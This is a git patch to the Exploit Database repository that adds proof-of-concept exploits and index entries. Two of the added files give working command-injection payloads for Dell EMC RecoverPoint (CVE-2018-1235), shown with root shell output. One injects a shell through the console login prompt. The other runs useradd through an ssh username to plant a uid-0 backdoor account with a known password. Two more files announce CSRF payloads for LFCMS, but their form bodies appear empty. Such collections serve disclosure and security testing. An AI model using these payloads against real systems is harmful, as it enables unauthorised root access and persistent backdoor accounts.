From 11ecb9c0316af9eb163d8d0ebf6573ca95d08fe1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 22 Jun 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-06-22 4 changes to exploits/shellcodes Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution VideoInsight WebClient 5 - SQL Injection LFCMS 3.7.0 - Cross-Site Request Forgery (Add User) LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin) --- exploits/linux/local/44920.txt | 23 +++++++++++++++++++++++ exploits/linux/remote/44921.txt | 28 ++++++++++++++++++++++++++++ exploits/php/webapps/44918.html | 27 +++++++++++++++++++++++++++ exploits/php/webapps/44919.html | 26 ++++++++++++++++++++++++++ files_exploits.csv | 6 +++++- 5 files changed, 109 insertions(+), 1 deletion(-) create mode 100644 exploits/linux/local/44920.txt create mode 100644 exploits/linux/remote/44921.txt create mode 100644 exploits/php/webapps/44918.html create mode 100644 exploits/php/webapps/44919.html diff --git a/exploits/linux/local/44920.txt b/exploits/linux/local/44920.txt new file mode 100644 index 000000000..5603e3e2f --- /dev/null +++ b/exploits/linux/local/44920.txt @@ -0,0 +1,23 @@ +# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution +# Date: 2018-06-21 +# Exploit Author: Paul Taylor +# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3 +# Vendor Advisory: DSA-2018-095 +# Vendor KB: https://support.emc.com/kb/521234 +# Github: https://github.com/bao7uo/dell-emc_recoverpoint +# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities +# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2 +# CVE: CVE-2018-1235 + +# 1. Description +# An OS command injection vulnerability exists in the mechanism which processes usernames +# which are presented for authentication, allowing unauthenticated root access +# via tty console login. + +# 2. Proof of Concept +# Inject into local tty console login prompt + +recoverpoint login: $(bash > &2) +root@recoverpoint:/# id +uid=0(root) gid=0(root) groups=0(root) +root@recoverpoint:/# \ No newline at end of file diff --git a/exploits/linux/remote/44921.txt b/exploits/linux/remote/44921.txt new file mode 100644 index 000000000..cbbf1c6c5 --- /dev/null +++ b/exploits/linux/remote/44921.txt @@ -0,0 +1,28 @@ +# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution +# Date: 2018-06-21 +# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3 +# Exploit Author: Paul Taylor +# Vendor Advisory: DSA-2018-095 +# Vendor KB: https://support.emc.com/kb/521234 +# Github: https://github.com/bao7uo/dell-emc_recoverpoint +# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities +# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2 +# CVE: CVE-2018-1235 + +# 1. Description +# An OS command injection vulnerability exists in the mechanism which processes usernames +# which are presented for authentication, allowing unauthenticated root access via +# the ssh service. + +# 2. Proof of Concept +# Inject into ssh username. +# N.B. combined length of new username+password is limited to 21 due to injection length limitations + +$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3 +Password: ^C +$ ssh bao7uo@192.168.57.3 +Password: Secret123 +Could not chdir to home directory /home/bao7uo: No such file or directory +root@recoverpoint:/# id +uid=0(root) gid=0(root) groups=0(root) +root@recoverpoint:/# \ No newline at end of file diff --git a/exploits/php/webapps/44918.html b/exploits/php/webapps/44918.html new file mode 100644 index 000000000..7b365c248 --- /dev/null +++ b/exploits/php/webapps/44918.html @@ -0,0 +1,27 @@ +# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily. +# Date: 2018-06-20 +# Exploit Author: bay0net +# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html +# Software Link: http://www.lfdycms.com/home/down/index/id/26.html +# Version: 3.7.0 +# CVE : CVE-2018-12602 + + +A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily. + + +The payload for attack is as follows. + + + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/44919.html b/exploits/php/webapps/44919.html new file mode 100644 index 000000000..7ecfdb74d --- /dev/null +++ b/exploits/php/webapps/44919.html @@ -0,0 +1,26 @@ +# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily. +# Date: 2018-06-20 +# Exploit Author: bay0net +# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203899.html +# Software Link: http://www.lfdycms.com/home/down/index/id/26.html +# Version: 3.7.0 +# CVE : CVE-2018-12603 + + +A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily. + + +The payload for attack is as follows. + + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 62bcd424e..b74cfdfae 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9791,6 +9791,7 @@ id,file,description,date,author,type,platform,port 44903,exploits/windows/local/44903.py,"Audiograbber 1.83 - Local Buffer Overflow (SEH)",2018-06-18,"Dennis 'dhn' Herrmann",local,windows, 44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux, 44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows, +44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16579,6 +16580,7 @@ id,file,description,date,author,type,platform,port 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux, 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios, 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux, +44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39571,4 +39573,6 @@ id,file,description,date,author,type,platform,port 44912,exploits/hardware/webapps/44912.py,"TP-Link TL-WA850RE - Remote Command Execution",2018-06-20,yoresongo,webapps,hardware, 44913,exploits/linux/webapps/44913.py,"Apache CouchDB < 2.1.0 - Remote Code Execution",2018-06-20,"Cody Zacharias",webapps,linux, 44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80 -44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows, +44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,80 +44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80 +44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80